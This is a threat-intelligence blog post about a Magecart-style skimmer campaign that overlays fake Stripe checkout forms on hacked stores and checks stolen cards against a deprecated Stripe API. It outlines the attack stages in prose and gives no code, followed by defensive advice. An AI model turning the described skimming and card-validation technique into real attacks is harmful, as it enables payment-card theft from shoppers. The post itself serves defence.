Introduction
In a rapidly evolving threat landscape where eCommerce platforms remain prime targets, a newly uncovered web skimmer campaign reveals a troubling shift in how cybercriminals are innovating to maximize success and evade detection. Security researchers have identified a threat actor group exploiting a deprecated Stripe API endpoint to validate stolen card data in real time, allowing them to efficiently steal only valid credit card information.
As online merchants increasingly rely on third-party platforms such as WooCommerce, WordPress, and PrestaShop, attackers are turning these widely used systems into springboards for their operations. This blog explores the technical details, impact, and implications of the latest skimmer campaign, with a strong emphasis on detection strategies and best practices for mitigation.
The Rise of Intelligent Skimming Operations
Web skimming, also known as Magecart-style attacks, involves the injection of malicious JavaScript into eCommerce websites to steal sensitive data entered by customers—typically payment information. While skimming is not a new tactic, what makes this campaign particularly alarming is its use of the now-deprecated Stripe API (api.stripe[.]com/v1/sources) to perform real-time card validation before exfiltration.
According to researchers from Jscrambler and Source Defense, this technique ensures that the attackers’ backend infrastructure only receives legitimate and usable card information, thereby reducing noise, increasing operational efficiency, and minimizing the chances of early detection.
Timeline of Events and Discovery
- August 20, 2024: Campaign begins targeting eCommerce merchants.
- February 2025: Source Defense identifies and discloses a portion of the campaign.
- March 2025: Jscrambler publishes detailed analysis revealing the use of the deprecated Stripe API.
To date, at least 49 merchants have been confirmed as victims. While 15 of those sites have since removed the malicious scripts, the threat is still active and likely targeting a broader set of merchants.
Technical Deep Dive: How the Attack Works
Step 1: Exploiting Site Vulnerabilities
The attackers target popular platforms like WooCommerce, WordPress, and PrestaShop—often through known vulnerabilities or misconfigurations. Once a foothold is gained, they inject an obfuscated JavaScript loader.
Step 2: Loader Script Execution
The loader script performs the following actions:
- Decodes a Base64-encoded second-stage payload
- Injects and renders a counterfeit payment form that mimics the Stripe checkout interface
Step 3: Overriding Legitimate Stripe Form
The malicious skimming script hides the genuine Stripe iframe and overlays it with a clone, complete with a fake ‘Place Order’ button that replaces the real one. This fake interface is designed to be indistinguishable from the original.
Step 4: Validating Card Data
Once users input their payment details, the skimmer uses the legacy Stripe API to validate the card information in real-time:
- Valid cards trigger a Base64-encoded data transfer to the attacker’s server
- Invalid cards result in an error prompt that mimics standard UI behavior, prompting users to retry
Step 5: Data Exfiltration
The valid card data is then exfiltrated to attacker-controlled infrastructure via encrypted and obfuscated HTTP requests. The operation concludes with a fake error message, clearing the form and deceiving the user into thinking a harmless glitch occurred.
Adaptability: Expanding Beyond Stripe
The skimmer campaign is not limited to Stripe. Researchers found evidence of cloned payment forms impersonating Square and other providers. Additionally, the script adds cryptocurrency options (Bitcoin, Ether, Tether, and Litecoin) as decoy payment methods, possibly to increase the form’s legitimacy or even test other monetization channels.
Indications of Automation and Toolkits
One of the most notable features of the campaign is its customization:
- Each skimmer appears tailored for the specific merchant website it infects.
- The attacker infrastructure seems capable of dynamically generating the scripts.
This points to the use of a skimmer generation toolkit or builder, designed to customize the payload depending on the host’s branding and HTML structure. Such automation reduces manual effort and expands the scope and scalability of the attack.
Consequences for Merchants and Consumers
This campaign illustrates the growing sophistication of skimmer groups and the severe consequences of not securing payment platforms:
- For Merchants:
- Reputational damage
- Regulatory fines for non-compliance with PCI-DSS
- Loss of customer trust
- For Consumers:
- Identity theft
- Unauthorized financial transactions
- Exposure of sensitive personal information
Detection and Mitigation Strategies
For Merchants
- Upgrade and Patch:
- Keep platforms and plugins up-to-date
- Apply security patches for WooCommerce, WordPress, PrestaShop, etc.
- Content Security Policy (CSP):
- Implement a strong CSP to control the sources of executable scripts
- Subresource Integrity (SRI):
- Ensure third-party scripts are validated using integrity attributes
- JavaScript Integrity Monitoring:
- Use tools like Jscrambler to detect unauthorized script changes
- Regular Code Audits:
- Perform integrity checks of frontend code and templates
For Developers
- Validate all third-party dependencies
- Avoid using deprecated APIs and regularly audit your integration points
For Consumers
- Use virtual cards for online payments
- Monitor account statements for unauthorized transactions
- Enable alerts for real-time purchase notifications
Broader Implications: The Hidden Dangers of Deprecated APIs
This campaign exposes a critical blind spot in application security: the continued presence and accessibility of deprecated APIs. While Stripe officially replaced the sources API with the PaymentMethods API in May 2024, many legacy integrations and third-party plugins may still rely on or expose the older endpoint.
What can be done?
- API providers should monitor and enforce deprecation timelines
- Merchants must audit their platforms for outdated integrations
- Security tools need to evolve beyond file-based detection and analyze behavior
Final Thoughts: A Call to Action
The Stripe API skimmer campaign represents the convergence of technical ingenuity and operational discipline in modern threat campaigns. By leveraging an old yet functional API, attackers were able to streamline their data collection process while minimizing exposure.
The real lesson here is two-fold:
- Legacy systems and integrations are an overlooked risk. If an API or feature has been deprecated, it should be disabled or replaced promptly.
- Security is a shared responsibility. Developers, merchants, and end-users must all take proactive steps to harden systems and detect anomalous behavior early.
As the threat landscape continues to evolve, organizations must prioritize continuous monitoring, automated defense strategies, and employee awareness to stay ahead of highly adaptive threat actors.
Stay Informed, Stay Secure.
If you’re a merchant using Stripe or any payment gateway, now is the time to audit your integrations and monitor for suspicious JavaScript activity. With the right tools and vigilance, even the most sophisticated skimmer campaigns can be identified and mitigated before significant damage is done.
SoloSecurities
Add comment